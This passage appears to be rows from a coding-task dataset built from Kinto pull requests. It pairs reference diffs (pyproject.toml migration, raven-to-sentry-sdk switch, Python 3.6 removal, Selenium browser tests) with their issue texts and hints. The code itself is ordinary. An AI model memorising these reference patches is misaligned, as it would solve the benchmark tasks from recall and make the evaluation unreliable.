- refer to the *Kinto* `source code <https://github.com/Kinto/kinto/blob/13.6.2/kinto/core/__init__.py#L34-L103>`_.
+ refer to the *Kinto* `source code <https://github.com/Kinto/kinto/blob/main/kinto/core/__init__.py>`_.
By default, nobody can read buckets list. You can change that using:
diff --git a/pyproject.toml b/pyproject.toml
index b5403472b..dc75b4cc5 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,3 +1,107 @@
+[project]
+dynamic = ["version", "readme"]
+name = "kinto"
+description = "Kinto Web Service - Store, Sync, Share, and Self-Host."
+license = {file = "LICENSE"}
+classifiers = [
+ "Programming Language :: Python",
+ "Programming Language :: Python :: 3",
+ "Programming Language :: Python :: 3.8",
+ "Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
+ "Programming Language :: Python :: 3.11",
+ "Programming Language :: Python :: Implementation :: CPython",
+ "Topic :: Internet :: WWW/HTTP",
+ "Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
+ "License :: OSI Approved :: Apache Software License",
+]
+keywords = ["web", "sync", "json", "storage", "services"]
+authors = [
+ {name = "Mozilla Services", email = "[email protected]"},
+]
+dependencies = [
+ "bcrypt",
+ "colander",
+ "cornice",
+ "cornice_swagger",
+ "dockerflow",
+ "jsonschema",
+ "jsonpatch",
+ "logging-color-formatter",
+ "python-dateutil",
+ "pyramid",
+ "pyramid_mailer",
+ "pyramid_multiauth",
+ "transaction",
+ "pyramid_tm",
+ "requests",
+ "waitress",
+ "python-rapidjson",
+]
+
+[project.urls]
+Repository = "https://github.com/Kinto/kinto"
+
+[project.scripts]
+kinto = "kinto.__main__:main"
+
+[project.entry-points."paste.app_factory"]
+main = "kinto:main"
+
+[tool.setuptools.packages.find]
+include = ["kinto"]
+
+[tool.setuptools.dynamic]
+readme = {file = ["README.rst", "CONTRIBUTORS.rst"]}
+
+[tool.setuptools_scm]
+# can be empty if no extra settings are needed, presence enables setuptools_scm
+
+[build-system]
+requires = ["setuptools>=64", "setuptools_scm>=8"]
+build-backend = "setuptools.build_meta"
+
+[project.optional-dependencies]
+redis = [
+ "kinto_redis",
+]
+memcached = [
+ "python-memcached",
+]
+postgresql = [
+ "SQLAlchemy < 3",
+ "psycopg2",
+ "zope.sqlalchemy",
+]
+monitoring = [
+ "newrelic",
+ "sentry-sdk[sqlalchemy]",
+ "statsd",
+ "werkzeug",
+]
+test = [
+ "bravado",
+ "pytest",
+ "pytest-cache",
+ "pytest-cov",
+ "selenium",
+ "webtest",
+]
+dev = [
+ "build",
+ "ruff",
+ "twine",
+]
+
+[tool.pip-tools]
+# Pip does not support installing in editable mode with hashes.
+generate-hashes = false
+# Pip does not support extras in constraints.
+strip-extras = true
+
+[tool.coverage.run]
+branch = true
+
[tool.ruff]
line-length = 99
extend-exclude = [
diff --git a/requirements.in b/requirements.in
new file mode 100644
index 000000000..b706aa9ec
--- /dev/null
+++ b/requirements.in
@@ -0,0 +1,40 @@
+# main dependencies
+bcrypt
+colander
+cornice
+cornice_swagger
+dockerflow
+jsonschema
+jsonpatch
+logging-color-formatter
+python-dateutil
+pyramid
+pyramid_mailer
+pyramid_multiauth
+transaction
+pyramid_tm
+requests
+waitress
+python-rapidjson
+# optional dependencies
+# memcached
+python-memcached
+# postgresql
+SQLAlchemy < 3
+psycopg2
+zope.sqlalchemy
+# monitoring
+newrelic
+sentry-sdk[sqlalchemy]
+statsd
+werkzeug
+# test
+bravado_core
+pytest
+pytest-cache
+pytest-cov
+selenium
+webtest
+# dev
+build
+ruff
diff --git a/requirements.txt b/requirements.txt
index c1544988c..57816f14d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,25 +1,275 @@
+#
+# This file is autogenerated by pip-compile with Python 3.9
+# by the following command:
+#
+# pip-compile --strip-extras
+#
+arrow==1.3.0
+ # via isoduration
+attrs==23.2.0
+ # via
+ # jsonschema
+ # outcome
+ # referencing
+ # trio
bcrypt==4.1.2
+ # via -r requirements.in
+beautifulsoup4==4.12.3
+ # via webtest
+bravado-core==6.1.1
+ # via -r requirements.in
+build==1.0.3
+ # via -r requirements.in
+certifi==2023.11.17
+ # via
+ # requests
+ # selenium
+ # sentry-sdk
+charset-normalizer==3.3.2
+ # via requests
colander==2.0
+ # via
+ # -r requirements.in
+ # cornice-swagger
+colorama==0.4.6
+ # via logging-color-formatter
cornice==6.0.1
+ # via
+ # -r requirements.in
+ # cornice-swagger
cornice-swagger==1.0.1
+ # via -r requirements.in
+coverage==7.4.0
+ # via
+ # coverage
+ # pytest-cov
dockerflow==2024.1.0
+ # via -r requirements.in
+exceptiongroup==1.2.0
+ # via
+ # pytest
+ # trio
+ # trio-websocket
+execnet==2.0.2
+ # via pytest-cache
+fqdn==1.5.1
+ # via jsonschema
+h11==0.14.0
+ # via wsproto
+hupper==1.12
+ # via pyramid
+idna==3.6
+ # via
+ # jsonschema
+ # requests
+ # trio
+importlib-metadata==7.0.1
+ # via build
+iniconfig==2.0.0
+ # via pytest
+iso8601==2.1.0
+ # via colander
+isoduration==20.11.0
+ # via jsonschema
jsonpatch==1.33
-jsonschema==4.20.0
-logging-color-formatter==1.0.3
+ # via -r requirements.in
+jsonpointer==2.4
+ # via
+ # jsonpatch
+ # jsonschema
+jsonref==1.1.0
+ # via bravado-core
+jsonschema==4.21.1
+ # via
+ # -r requirements.in
+ # bravado-core
+ # swagger-spec-validator
+jsonschema-specifications==2023.12.1
+ # via jsonschema
+logging-color-formatter==1.1.0
+ # via -r requirements.in
+markupsafe==2.1.4
+ # via werkzeug
+msgpack==1.0.7
+ # via bravado-core
newrelic==9.5.0
+ # via -r requirements.in
+outcome==1.3.0.post0
+ # via trio
+packaging==23.2
+ # via
+ # build
+ # pytest
+ # zope-sqlalchemy
+pastedeploy==3.1.0
+ # via plaster-pastedeploy
+plaster==1.1.2
+ # via
+ # plaster-pastedeploy
+ # pyramid
+plaster-pastedeploy==1.0.1
+ # via pyramid
+pluggy==1.3.0
+ # via pytest
psycopg2==2.9.9
+ # via -r requirements.in
+pyproject-hooks==1.0.0
+ # via build
pyramid==2.0.2
+ # via
+ # -r requirements.in
+ # cornice
+ # pyramid-mailer
+ # pyramid-multiauth
+ # pyramid-tm
pyramid-mailer==0.15.1
+ # via -r requirements.in
pyramid-multiauth==1.0.1
+ # via -r requirements.in
pyramid-tm==2.5
+ # via -r requirements.in
+pysocks==1.7.1
+ # via urllib3
+pytest==7.4.4
+ # via
+ # -r requirements.in
+ # pytest-cache
+ # pytest-cov
+pytest-cache==1.0
+ # via -r requirements.in
+pytest-cov==4.1.0
+ # via -r requirements.in
python-dateutil==2.8.2
+ # via
+ # -r requirements.in
+ # arrow
+ # bravado-core
python-memcached==1.62
-sentry-sdk==1.39.2
+ # via -r requirements.in
+python-rapidjson==1.14
+ # via -r requirements.in
+pytz==2023.3.post1
+ # via bravado-core
+pyyaml==6.0.1
+ # via
+ # bravado-core
+ # swagger-spec-validator
+referencing==0.32.1
+ # via
+ # jsonschema
+ # jsonschema-specifications
+repoze-sendmail==4.4.1
+ # via pyramid-mailer
requests==2.31.0
-SQLAlchemy==2.0.25
+ # via
+ # -r requirements.in
+ # bravado-core
+rfc3339-validator==0.1.4
+ # via jsonschema
+rfc3986-validator==0.1.1
+ # via jsonschema
+rpds-py==0.17.1
+ # via
+ # jsonschema
+ # referencing
+ruff==0.1.14
+ # via -r requirements.in
+selenium==4.12.0
+ # via -r requirements.in
+sentry-sdk==1.39.2
+ # via -r requirements.in
+simplejson==3.19.2
+ # via bravado-core
+six==1.16.0
+ # via
+ # bravado-core
+ # cornice-swagger
+ # python-dateutil
+ # rfc3339-validator
+sniffio==1.3.0
+ # via trio
+sortedcontainers==2.4.0
+ # via trio
+soupsieve==2.5
+ # via beautifulsoup4
+sqlalchemy==2.0.25
+ # via
+ # -r requirements.in
+ # sentry-sdk
+ # zope-sqlalchemy
statsd==4.0.1
+ # via -r requirements.in
+swagger-spec-validator==3.0.3
+ # via bravado-core
+tomli==2.0.1
+ # via
+ # build
+ # coverage
+ # pyproject-hooks
+ # pytest
transaction==4.0
-python-rapidjson==1.14
+ # via
+ # -r requirements.in
+ # pyramid-mailer
+ # pyramid-tm
+ # repoze-sendmail
+ # zope-sqlalchemy
+translationstring==1.4
+ # via
+ # colander
+ # pyramid
+trio==0.24.0
+ # via
+ # selenium
+ # trio-websocket
+trio-websocket==0.11.1
+ # via selenium
+types-python-dateutil==2.8.19.20240106
+ # via arrow
+typing-extensions==4.9.0
+ # via
+ # selenium
+ # sqlalchemy
+ # swagger-spec-validator
+uri-template==1.3.0
+ # via jsonschema
+urllib3==2.1.0
+ # via
+ # requests
+ # selenium
+ # sentry-sdk
+venusian==3.1.0
+ # via
+ # cornice
+ # pyramid
waitress==2.1.2
-Werkzeug==3.0.1
-zope.sqlalchemy==3.1
+ # via
+ # -r requirements.in
+ # webtest
+webcolors==1.13
+ # via jsonschema
+webob==1.8.7
+ # via
+ # pyramid
+ # webtest
+webtest==3.0.0
+ # via -r requirements.in
+werkzeug==3.0.1
+ # via -r requirements.in
+wsproto==1.2.0
+ # via trio-websocket
+zipp==3.17.0
+ # via importlib-metadata
+zope-deprecation==5.0
+ # via pyramid
+zope-interface==6.1
+ # via
+ # pyramid
+ # repoze-sendmail
+ # transaction
+ # zope-sqlalchemy
+zope-sqlalchemy==3.1
+ # via -r requirements.in
+
+# The following packages are considered to be unsafe in a requirements file:
+# setuptools
diff --git a/setup.cfg b/setup.cfg
deleted file mode 100644
index 5b30cfbc4..000000000
--- a/setup.cfg
+++ /dev/null
@@ -1,89 +0,0 @@
-[metadata]
-name = kinto
-version = 16.3.0
-description = Kinto Web Service - Store, Sync, Share, and Self-Host.
-long_description = file: README.rst, CHANGELOG.rst, CONTRIBUTORS.rst
-long_description_content_type = text/x-rst
-license = Apache License (2.0)
-author = Mozilla Services
-author_email = [email protected]
-url = https://github.com/Kinto/kinto
-download_url = https://github.com/Kinto/kinto/tarball/main
-keywords = web sync json storage services
-classifiers =
- Programming Language :: Python
- Programming Language :: Python :: 3
- Programming Language :: Python :: 3.8
- Programming Language :: Python :: 3.9
- Programming Language :: Python :: 3.10
- Programming Language :: Python :: 3.11
- Programming Language :: Python :: Implementation :: CPython
- Topic :: Internet :: WWW/HTTP
- Topic :: Internet :: WWW/HTTP :: WSGI :: Application
- License :: OSI Approved :: Apache Software License
-
-[options]
-packages = find:
-include_package_data = True
-zip_safe = False
-install_requires =
- bcrypt
- colander
- cornice
- cornice_swagger
- dockerflow
- jsonschema
- jsonpatch
- logging-color-formatter
- python-dateutil
- pyramid
- pyramid_mailer
- pyramid_multiauth
- transaction
- pyramid_tm
- requests
- waitress
- python-rapidjson
-tests_require =
- bravado_core
- pytest
- pytest-runner
- WebTest
-test_suite = tests
-
-[options.packages.find]
-exclude =
- docs
- tests
- tests.*
-
-[options.package_data]
-* = *.rst, *.py, *.yaml
-
-[options.entry_points]
-paste.app_factory =
- main = kinto:main
-console_scripts =
- kinto = kinto.__main__:main
-
-[options.extras_require]
-memcached =
- python-memcached
-postgresql =
- SQLAlchemy < 3
- psycopg2
- zope.sqlalchemy
-monitoring =
- newrelic
- sentry-sdk[sqlalchemy]
- statsd
- werkzeug
-
-[aliases]
-test=pytest
-
-[bdist_wheel]
-python_tag=cp3
-
-[coverage:run]
-branch = True
diff --git a/setup.py b/setup.py
deleted file mode 100644
index b908cbe55..000000000
--- a/setup.py
+++ /dev/null
@@ -1,3 +0,0 @@
-import setuptools
-
-setuptools.setup()
| Get rid of tox
The tox.ini duplicates a lot of dependencies lists and test commands etc.
With this PR, we test different environments in the CI, and in case the developers want to run the project locally with a specific version of Python, then it's their responsability (the `Makefile` supports the creation of a venv in advance anyway)
Run functional tests on freshly built container
This will make sure we don't break the `docker build` and that published images always get consistently tested.
Decouple `kinto-redis` from this repository
In order to make sure we don't offer features that are unstable or outdated, I would prefer to decouple kinto-redis from this project, because it is not actively maintained (last commit 3 years ago).
Our team at Mozilla is the only group of folks who still actively maintains kinto. And since kinto-redis is not used in our production service anymore, it is not in the bag of things we maintain.
It does not mean it is not supported, it is probably stable and will run as expected. If you want to use it, you have to set it up yourself, since `kinto init`won't propose the option anymore. That's why I mark this PR as breaking change.
| 2024-01-24T07:44:41 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3055 | e7dd22e221f220754383bfa44010d0ccfbfbd58e | diff --git a/CHANGELOG.rst b/CHANGELOG.rst
index 97d76656b..226114202 100644
--- a/CHANGELOG.rst
+++ b/CHANGELOG.rst
@@ -6,6 +6,40 @@ This document describes changes between each past release.
14.8.1 (unreleased)
-------------------
+**Breaking Changes**
+
+- ``raven`` is not installed by default anymore (fixes #3054). Sentry reporting is now enabled via settings (or environment variables).
+
+In order to migrate from Kinto <14 to Kinto 15, remove the mention of ``sentry`` and ``raven`` from your logging configuration:
+
+.. code-block:: diff
+
+ # kinto.ini
+
+ [logger_root]
+ level = INFO
+ - handlers = console, sentry
+ + handlers = console
+
+ [handlers]
+ - keys = console, sentry
+ + keys = console
+
+ - [handler_sentry]
+ - class = raven.handlers.logging.SentryHandler
+ - args = ('https://<key>:<secret>@app.getsentry.com/<project>',)
+ - level = WARNING
+ - formatter = generic
+
+And add the following settings:
+
+.. code-block:: ini
+
+ kinto.sentry_dsn = https://[email protected]/1
+ kinto.sentry_env = prod
+
+For more information, see `Settings documentation <https://kinto.readthedocs.io/en/stable/configuration/settings.html#authentication>`_.
+
**Documentation**
- Fix ``/batch`` endpoint documentation about required authentication.
diff --git a/docs/configuration/production.rst b/docs/configuration/production.rst
index 8f8f72e32..87f0ac053 100644
--- a/docs/configuration/production.rst
+++ b/docs/configuration/production.rst
@@ -271,7 +271,6 @@ processed through `Kibana <https://github.com/elastic/kibana>`_ or
With the following configuration, all logs are structured in JSON and
redirected to standard output (See `12factor app <http://12factor.net/logs>`_).
-A `Sentry <https://getsentry.com>`_ logger is also enabled.
.. note::
@@ -283,14 +282,14 @@ A `Sentry <https://getsentry.com>`_ logger is also enabled.
keys = root
[handlers]
- keys = console, sentry
+ keys = console
[formatters]
keys = generic, json
[logger_root]
level = INFO
- handlers = console, sentry
+ handlers = console
[handler_console]
class = StreamHandler
@@ -298,12 +297,6 @@ A `Sentry <https://getsentry.com>`_ logger is also enabled.
level = NOTSET
formatter = json
- [handler_sentry]
- class = raven.handlers.logging.SentryHandler
- args = ('https://<key>:<secret>@app.getsentry.com/<project>',)
- level = WARNING
- formatter = generic
-
[formatter_json]
class = kinto.core.JsonLogFormatter
diff --git a/docs/configuration/settings.rst b/docs/configuration/settings.rst
index 61ac90921..b80ff07ae 100644
--- a/docs/configuration/settings.rst
+++ b/docs/configuration/settings.rst
@@ -396,17 +396,29 @@ Example output:
{"Pid": 19240, "Type": "root", "Timestamp": 1489067817834153984, "Severity": 4, "Hostname": "pluo", "Logger": "%", "EnvVersion": "2.0", "Fields": {"perm": "read", "userid": "ldap:[email protected]", "message": "Permission not granted.", "uri": "/buckets/123"}}
+.. _handling-exceptions-with-sentry:
+
Handling exceptions with Sentry
:::::::::::::::::::::::::::::::
-Requires the ``raven`` package.
-Sentry logging can be enabled `as explained in official documentation
-<https://raven.readthedocs.io/en/latest/integrations/pyramid.html#logger-setup>`_.
+Sentry reporting can be enabled via the following settings:
+
+.. code-block:: ini
+
+ kinto.sentry_dsn = https://[email protected]/1
+ kinto.sentry_env = stage
+
+Or the equivalent environment variables:
+
+::
+
+ SENTRY_DSN=https://[email protected]/1
+ SENTRY_ENV=stage
.. note::
- The application sends an *INFO* message on startup (mainly for setup check).
+ The application sends an event on startup (mainly for setup check).
Monitoring with StatsD
diff --git a/kinto/config/kinto.tpl b/kinto/config/kinto.tpl
index 893c43620..c333024de 100644
--- a/kinto/config/kinto.tpl
+++ b/kinto/config/kinto.tpl
@@ -239,6 +239,9 @@ kinto.bucket_create_principals = account:admin
# kinto.statsd_prefix = kinto
# kinto.statsd_url =
+# kinto.sentry_dsn =
+# kinto.sentry_env =
+
# kinto.newrelic_config =
# kinto.newrelic_env = dev
diff --git a/kinto/core/__init__.py b/kinto/core/__init__.py
index 6824dc8a4..173e55004 100644
--- a/kinto/core/__init__.py
+++ b/kinto/core/__init__.py
@@ -63,6 +63,7 @@
"kinto.core.initialization.setup_deprecation",
"kinto.core.initialization.setup_authentication",
"kinto.core.initialization.setup_backoff",
+ "kinto.core.initialization.setup_sentry",
"kinto.core.initialization.setup_statsd",
"kinto.core.initialization.setup_listeners",
"kinto.core.events.setup_transaction_hook",
@@ -86,6 +87,8 @@
"retry_after_seconds": 30,
"version_prefix_redirect_ttl_seconds": -1,
"settings_prefix": "",
+ "sentry_dsn": None,
+ "sentry_env": None,
"statsd_backend": "kinto.core.statsd",
"statsd_prefix": "kinto.core",
"statsd_url": None,
diff --git a/kinto/core/initialization.py b/kinto/core/initialization.py
index 4d8a92517..05c0329b4 100644
--- a/kinto/core/initialization.py
+++ b/kinto/core/initialization.py
@@ -5,7 +5,7 @@
from datetime import datetime
from dateutil import parser as dateparser
-from pyramid.events import NewRequest, NewResponse
+from pyramid.events import ApplicationCreated, NewRequest, NewResponse
from pyramid.exceptions import ConfigurationError
from pyramid.httpexceptions import HTTPBadRequest, HTTPGone, HTTPTemporaryRedirect
from pyramid.interfaces import IAuthenticationPolicy
@@ -26,6 +26,11 @@
from werkzeug.middleware.profiler import ProfilerMiddleware
except ImportError: # pragma: no cover
ProfilerMiddleware = False
+try:
+ import sentry_sdk
+ from sentry_sdk.integrations.pyramid import PyramidIntegration
+except ImportError: # pragma: no cover
+ sentry_sdk = None
logger = logging.getLogger(__name__)
@@ -264,6 +269,34 @@ def setup_cache(config):
config.registry.heartbeats["cache"] = heartbeat
+def setup_sentry(config):
+ settings = config.get_settings()
+
+ # Note: SENTRY_DSN and SENTRY_ENV env variables will override
+ # .ini values thanks to `load_default_settings()`.
+
+ dsn = settings["sentry_dsn"]
+ if dsn:
+ env_options = {}
+ env = settings["sentry_env"]
+ if env:
+ env_options["environment"] = env
+
+ sentry_sdk.init(
+ dsn,
+ integrations=[
+ PyramidIntegration(),
+ ],
+ **env_options,
+ )
+
+ def on_app_created(event):
+ msg = "Running {project_name} {project_version}.".format_map(settings)
+ sentry_sdk.capture_message(msg, "info")
+
+ config.add_subscriber(on_app_created, ApplicationCreated)
+
+
def setup_statsd(config):
settings = config.get_settings()
config.registry.statsd = None
diff --git a/requirements.txt b/requirements.txt
index 00a7c005e..dd354535d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -14,7 +14,7 @@ pyramid-multiauth==1.0.1
pyramid-tm==2.5
python-dateutil==2.8.2
python-memcached==1.59
-raven==6.10.0
+sentry-sdk==1.9.10
requests==2.28.1
SQLAlchemy==1.4.41
statsd==3.3.0
diff --git a/setup.cfg b/setup.cfg
index f8bba467f..b1b377678 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -77,7 +77,7 @@ postgresql =
zope.sqlalchemy
monitoring =
newrelic
- raven
+ sentry-sdk
statsd
werkzeug
diff --git a/tox.ini b/tox.ini
index e7723bc63..030cb0884 100644
--- a/tox.ini
+++ b/tox.ini
@@ -13,7 +13,7 @@ deps =
-r{toxinidir}/dev-requirements.txt
psycopg2
newrelic
- raven
+ sentry-sdk
statsd
install_command = pip install {opts} {packages} -c{toxinidir}/requirements.txt
| Replace `raven` by `sentry-python`
`raven` is deprecated, we should use replace it with the maintained library.
https://github.com/getsentry/raven-python#readme
Replace `raven` by `sentry-python`
`raven` is deprecated, we should use replace it with the maintained library.
https://github.com/getsentry/raven-python#readme
| 2022-10-10T17:27:18 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-2883 | ea84d96f4232b1177b6204533d5ef5697085ba52 | diff --git a/Dockerfile b/Dockerfile
index fba79d891..0dd0fea0c 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,5 +1,5 @@
# Mozilla Kinto server
-FROM python:3.7-slim
+FROM python:3.10-slim
RUN groupadd --gid 10001 app && \
useradd --uid 10001 --gid 10001 --home /app --create-home app
diff --git a/README.rst b/README.rst
index 53c084373..6e6e1ff14 100644
--- a/README.rst
+++ b/README.rst
@@ -38,5 +38,5 @@ Kinto is a minimalist JSON storage service with synchronisation and sharing abil
Requirements
------------
-* **Python**: 3.6+
+* **Python**: 3.7+
* **Backends**: In-memory (development), PostgreSQL 9.5+ (production)
diff --git a/kinto/core/utils.py b/kinto/core/utils.py
index 26213efc0..9244c4b75 100644
--- a/kinto/core/utils.py
+++ b/kinto/core/utils.py
@@ -1,4 +1,4 @@
-import collections
+import collections.abc as collections_abc
import hashlib
import hmac
import os
@@ -172,7 +172,7 @@ def dict_subset(d, keys):
for key in keys:
if "." in key:
field, subfield = key.split(".", 1)
- if isinstance(d.get(field), collections.Mapping):
+ if isinstance(d.get(field), collections_abc.Mapping):
subvalue = dict_subset(d[field], [subfield])
result[field] = dict_merge(subvalue, result.get(field, {}))
elif field in d:
@@ -188,7 +188,7 @@ def dict_merge(a, b):
"""Merge the two specified dicts"""
result = dict(**b)
for key, value in a.items():
- if isinstance(value, collections.Mapping):
+ if isinstance(value, collections_abc.Mapping):
value = dict_merge(value, result.setdefault(key, {}))
result[key] = value
return result
diff --git a/setup.cfg b/setup.cfg
index a387598b8..27a7b9057 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -14,6 +14,9 @@ classifiers =
Programming Language :: Python :: 3
Programming Language :: Python :: 3.6
Programming Language :: Python :: 3.7
+ Programming Language :: Python :: 3.8
+ Programming Language :: Python :: 3.9
+ Programming Language :: Python :: 3.10
Programming Language :: Python :: Implementation :: CPython
Topic :: Internet :: WWW/HTTP
Topic :: Internet :: WWW/HTTP :: WSGI :: Application
diff --git a/tox.ini b/tox.ini
index 259cdc462..a8eb40f20 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,5 +1,5 @@
[tox]
-envlist = py36,py36-raw,py37,py38,py39
+envlist = py37,py38,py38-raw,py39,py10
skip_missing_interpreters = True
requires =
virtualenv >= 20.2.2
@@ -17,7 +17,7 @@ deps =
statsd
install_command = pip install {opts} {packages} -c{toxinidir}/requirements.txt
-[testenv:py36-raw]
+[testenv:py38-raw]
passenv = TRAVIS CI
commands =
python --version
| Make a plan to drop Python 3.6 compatability after it reaches EOL
Python 3.6 [is scheduled](https://devguide.python.org/#status-of-python-branches) to reach end-of-life (EOL) status later this year on 2021-12-23. We should consider if/when we want to follow suit and drop 3.6 compatibility from Kinto.
Make a plan to drop Python 3.6 compatability after it reaches EOL
Python 3.6 [is scheduled](https://devguide.python.org/#status-of-python-branches) to reach end-of-life (EOL) status later this year on 2021-12-23. We should consider if/when we want to follow suit and drop 3.6 compatibility from Kinto.
| Let's drop support for Python 3.6, fee free to start a PR about this removal.
I guess we can also make sure to support both Python 3.9 and Python 3.10 in the meantime.
Let's drop support for Python 3.6, fee free to start a PR about this removal.
I guess we can also make sure to support both Python 3.9 and Python 3.10 in the meantime. | 2021-10-15T10:41:28 | 0.0 | [] | [] |
||
Kinto/kinto | Kinto__kinto-2880 | ea84d96f4232b1177b6204533d5ef5697085ba52 | diff --git a/.github/workflows/admin.yml b/.github/workflows/admin.yml
index ffbac82a6..39d99a4e0 100644
--- a/.github/workflows/admin.yml
+++ b/.github/workflows/admin.yml
@@ -7,7 +7,7 @@ on:
name: Kinto Admin
jobs:
chore:
- name: Build Kinto Admin
+ name: Kinto Admin
runs-on: ubuntu-latest
steps:
@@ -38,3 +38,26 @@ jobs:
run: |
source .venv/bin/activate
make build-kinto-admin
+
+ - name: geckodriver/firefox
+ run: |
+ echo "geckodriver/firefox"
+ which geckodriver
+ geckodriver --version
+ which firefox
+ firefox --version
+
+ - name: Install dependencies
+ run: |
+ source .venv/bin/activate
+ make install-dev
+
+ - name: Start Kinto
+ run: |
+ source .venv/bin/activate
+ kinto start --ini tests/browser.ini & sleep 5
+
+ - name: Browser Tests
+ run: |
+ source .venv/bin/activate
+ make browser-test
diff --git a/CHANGELOG.rst b/CHANGELOG.rst
index 8df363529..433fa3304 100644
--- a/CHANGELOG.rst
+++ b/CHANGELOG.rst
@@ -6,7 +6,13 @@ This document describes changes between each past release.
14.5.1 (unreleased)
-------------------
-- Nothing changed yet.
+**Bug fixes**
+
+- Fix bundle of kinto-admin, using same versions of React as upstream package #GroundhogDay
+
+**Internal Changes**
+
+- Add Selenium tests to detect Admin UI packaging issues (#2880)
14.5.0 (2021-10-08)
diff --git a/Makefile b/Makefile
index 60535ccb5..2b523dffb 100644
--- a/Makefile
+++ b/Makefile
@@ -29,6 +29,7 @@ help:
@echo " tdd run pytest-watch to rerun tests automatically on changes for tdd"
@echo " tests-once only run the tests once with the default python interpreter"
@echo " functional run functional test against a real kinto"
+ @echo " browser-test run browser test against a real kinto"
@echo " clean remove *.pyc files and __pycache__ directory"
@echo " distclean remove *.egg-info files and *.egg, build and dist directories"
@echo " maintainer-clean remove the .tox and the .venv directories"
@@ -109,6 +110,9 @@ runkinto: install-dev
functional: install-dev need-kinto-running
$(VENV)/bin/py.test tests/functional.py
+browser-test: need-kinto-running
+ $(VENV)/bin/py.test tests/browser.py
+
clean:
find . -name '*.pyc' -delete
find . -name '__pycache__' -type d | xargs rm -fr
diff --git a/dev-requirements.txt b/dev-requirements.txt
index 6571b7025..f32950500 100644
--- a/dev-requirements.txt
+++ b/dev-requirements.txt
@@ -7,10 +7,11 @@ pytest-cache==1.0
pytest-cov==3.0.0
pytest-watch==4.2.0
python-memcached==1.59
+selenium==3.141.0
swagger-spec-validator==2.7.3
therapist==2.2.0
tox==3.24.4
WebTest==3.0.0
wheel==0.37.0
zest.releaser==6.22.1
-zope.sqlalchemy==1.6
+zope.sqlalchemy==1.6
\ No newline at end of file
diff --git a/docs/community.rst b/docs/community.rst
index 3d478d529..f54da34f7 100644
--- a/docs/community.rst
+++ b/docs/community.rst
@@ -223,6 +223,49 @@ For example:
.venv/bin/pip install -e ../cornice/
+Functional Tests
+----------------
+
+In a terminal, run an instance with the provided ``functional.ini`` configuration:
+
+::
+
+ make runkinto
+
+In another terminal, run the end-to-end tests with:
+
+::
+
+ make functional
+
+
+Browser Tests
+-------------
+
+Make sure the `geckodriver <https://github.com/mozilla/geckodriver/releases>`_ binary is available in your path.
+
+.. note::
+
+ If your installation of *Firefox* is custom, specify the path of its binary using an alias:
+
+ ::
+
+ alias geckodriver="geckodriver --binary /path/to/firefox"
+
+
+In a terminal, run an instance with the provided ``browser.ini`` configuration:
+
+::
+
+ kinto start --ini tests/browser.ini
+
+In another terminal, run the end-to-end tests with:
+
+::
+
+ make browser-test
+
+
Cleaning your environment
-------------------------
diff --git a/kinto/plugins/admin/package-lock.json b/kinto/plugins/admin/package-lock.json
index 68beedd62..ed7bc2768 100644
--- a/kinto/plugins/admin/package-lock.json
+++ b/kinto/plugins/admin/package-lock.json
@@ -12,8 +12,8 @@
"codemirror": "^5.63.1",
"kinto-admin": "1.30.2",
"lodash.isequalwith": "^4.4.0",
- "react": "^17.0.2",
- "react-dom": "^17.0.2",
+ "react": "^16.8.6",
+ "react-dom": "^16.8.6",
"react-router": "^5.2.1",
"redux": "^4.1.1",
"typescript": "^4.4.3"
@@ -14564,42 +14564,6 @@
"react": ">=15"
}
},
- "node_modules/kinto-admin/node_modules/react": {
- "version": "16.14.0",
- "resolved": "https://registry.npmjs.org/react/-/react-16.14.0.tgz",
- "integrity": "sha512-0X2CImDkJGApiAlcf0ODKIneSwBPhqJawOa5wCtKbu7ZECrmS26NvtSILynQ66cgkT/RJ4LidJOc3bUESwmU8g==",
- "dependencies": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1",
- "prop-types": "^15.6.2"
- },
- "engines": {
- "node": ">=0.10.0"
- }
- },
- "node_modules/kinto-admin/node_modules/react-dom": {
- "version": "16.14.0",
- "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.14.0.tgz",
- "integrity": "sha512-1gCeQXDLoIqMgqD3IO2Ah9bnf0w9kzhwN5q4FGnHZ67hBm9yePzB5JJAIQCc8x3pFnNlwFq4RidZggNAAkzWWw==",
- "dependencies": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1",
- "prop-types": "^15.6.2",
- "scheduler": "^0.19.1"
- },
- "peerDependencies": {
- "react": "^16.14.0"
- }
- },
- "node_modules/kinto-admin/node_modules/scheduler": {
- "version": "0.19.1",
- "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.19.1.tgz",
- "integrity": "sha512-n/zwRWRYSUj0/3g/otKDRPMh6qv2SYMWNq85IEa8iZyAv8od9zDYpGSnpBEjNgcMNq6Scbu5KfIPxNF72R/2EA==",
- "dependencies": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1"
- }
- },
"node_modules/kinto-http": {
"version": "5.3.0",
"resolved": "https://registry.npmjs.org/kinto-http/-/kinto-http-5.3.0.tgz",
@@ -18292,12 +18256,13 @@
}
},
"node_modules/react": {
- "version": "17.0.2",
- "resolved": "https://registry.npmjs.org/react/-/react-17.0.2.tgz",
- "integrity": "sha512-gnhPt75i/dq/z3/6q/0asP78D0u592D5L1pd7M8P+dck6Fu/jJeL6iVVK23fptSUZj8Vjf++7wXA8UNclGQcbA==",
+ "version": "16.14.0",
+ "resolved": "https://registry.npmjs.org/react/-/react-16.14.0.tgz",
+ "integrity": "sha512-0X2CImDkJGApiAlcf0ODKIneSwBPhqJawOa5wCtKbu7ZECrmS26NvtSILynQ66cgkT/RJ4LidJOc3bUESwmU8g==",
"dependencies": {
"loose-envify": "^1.1.0",
- "object-assign": "^4.1.1"
+ "object-assign": "^4.1.1",
+ "prop-types": "^15.6.2"
},
"engines": {
"node": ">=0.10.0"
@@ -18811,16 +18776,17 @@
